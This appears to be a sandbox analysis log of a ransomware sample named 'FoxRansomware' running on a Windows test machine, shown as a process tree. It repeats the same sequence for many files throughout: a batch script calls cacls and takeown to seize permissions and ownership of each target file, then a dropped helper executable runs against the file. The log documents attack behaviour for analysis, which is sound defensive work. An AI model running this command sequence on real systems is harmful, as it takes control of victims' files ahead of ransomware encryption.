C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:3992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can.fca" -nobanner3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can.fca" -nobanner4⤵PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:2916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:3528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa03.ths" -nobanner3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "usa03.ths" -nobanner4⤵PID:4056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:3428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:4024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:2748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner3⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "background.png" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:4564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:3384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab""2⤵PID:4500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab"3⤵PID:4416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cab1.cab" -nobanner3⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "cab1.cab" -nobanner4⤵PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:4548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner3⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "device.png" -nobanner4⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:3740
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:5616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5604
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:3328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner3⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tasks.xml" -nobanner4⤵PID:3808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:4132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner3⤵PID:3248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "behavior.xml" -nobanner4⤵PID:840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:3736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:5696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:5796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:5828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:4148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4172
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:4228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:4360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:4276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "directories.acrodata" -nobanner3⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:2516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:5188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:4596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner3⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "behavior.xml" -nobanner4⤵PID:4616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:2152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:1704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:4644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:4656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:4928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵PID:4768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:2600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
PID:4820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ChessMCE.png" -nobanner3⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ChessMCE.png" -nobanner4⤵PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:5012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:6024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:4800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:6040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:6004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:6116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:3704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:6088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:2488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_lg.gif" -nobanner3⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "server_lg.gif" -nobanner4⤵PID:4000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:2904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:6008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4328
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:4392
-
